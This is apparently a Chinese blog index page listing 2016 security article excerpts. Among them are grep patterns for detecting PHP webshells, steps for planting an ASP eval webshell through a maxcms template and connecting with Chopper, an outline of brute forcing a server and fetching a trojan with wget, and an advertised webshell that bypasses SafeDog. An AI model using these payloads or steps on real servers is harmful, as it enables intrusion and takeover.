1.站点根目录下查找是否被放置webshell木马根据语句判断是不是PHP木马脚本#find/storage/www/-name"*.php"|xargsgrep-in--color"eval("#grep-i--include=‘*.php‘-rsystem\s*\(/storage/www/2.统计访问日志中来自同ip出现的次数分析盗链、攻击、机器人#cataccess.log|awk‘{print..
分类:
其他好文 时间:
2016-02-01 22:41:00
阅读次数:
287
目标:win2003+iis6.0+maxcms 4.0(无公害,本地搭建测试) 进入后台找到模板页->管理自定义模板,如下图所示: 添加模板,内容如下:文件名填入:test.asp/ 内容填入:<%eval request("test")%> 在模板管理中找到模板的位置,如下图: 使用菜刀连接即可
分类:
Web程序 时间:
2016-01-31 21:47:49
阅读次数:
301
0x00 前言 数据隐藏已经渗透到了生活中的方方面面,之前一直对数据隐藏很有兴趣,但是乌云上关于数据隐藏的文章偏少,看了隐写术总结之后,我又去找了一些关于数据隐藏的资料,这里来与大家分享和总结下其他一些比较常见的隐藏手段,如果有写错的地方请直接指出,谢谢。 0x01 vmdk隐写 vmdk文件大家应
分类:
其他好文 时间:
2016-01-30 02:27:19
阅读次数:
266
原文:Best Android Tools For Security Audit and Hacking (不开心,找点事情做<<<) android系统占移动市场份额的80%且有恶意软件,这是一个问题。Hacker会对手机恶意操作,不只是发送扣费短信。在本文,将会介绍对各式各样的app进行渗透测试
分类:
移动开发 时间:
2016-01-28 18:51:01
阅读次数:
314
一、上传木马的过程1、默认端口22弱口令暴力破解;2、21端口或者3306端口弱口令暴力破解;3、webshell进行shell反弹提权;4、木马传入服务器的上面并且执行,通过木马的方式来控制你的服务器进行非法的操作。二、常见操作1、切入/tmp;2、wget下载木马;3、木马加载权限;4、执行木马...
分类:
系统相关 时间:
2016-01-27 12:25:41
阅读次数:
275
声明:此文档仅供安全学习和教学用途,禁止非法使用。wordpress的黑盒扫描器:wpscan实验效果:枚举用户列表、暴力破解用户密码、实验环境:靶机:TurnkeyLinux(wordpress版)攻击机:kalilinux2.0实验步骤:搭建靶机换机:1、下载镜像,官网https://www.turnkeylinux.org/搜..
分类:
其他好文 时间:
2016-01-25 17:33:47
阅读次数:
531
大家好! 我中心于2016年2月27日举办“高级信息安全技术专业人员培训班”和2016年3月19日举办“高级软件性能测试工程师培训班” 如有疑问请您及时与我们联系,感谢您的支持! 如有软件测评服务业务合作,如软件登记测试,确认测试,验收测试,等保测评,渗透测试,风险评估等项目服务,期待您...
分类:
其他好文 时间:
2016-01-25 15:06:30
阅读次数:
198
图像处理数学方法在图像处理的发展过程中,数学始终起着举足轻重的作用,并渗透在图像处理的所有分支之中。到上世纪六七十年代为止,以Fourier分析为代表的线性处理方法占据了几乎整 个数字图像处理领域。在此期间,借助于随机过程理论,人们建立了图像模型通过概率论以及在此基础上建立的信息论建立了图像编码的框...
分类:
其他好文 时间:
2016-01-24 15:40:09
阅读次数:
249
最近发现一款过狗shell,分享下。。。 本地搭建2008SERVER+php5+阿帕奇+网站安全狗+服务器安全狗+防护全开 测试可用。。。 默认密码:p0tt1 使用方法: 访问webshell页面,出现404,没关系,按p键,输入密码 或者webshell.php?password=p0tt1自...
分类:
Web程序 时间:
2016-01-23 22:54:49
阅读次数:
225
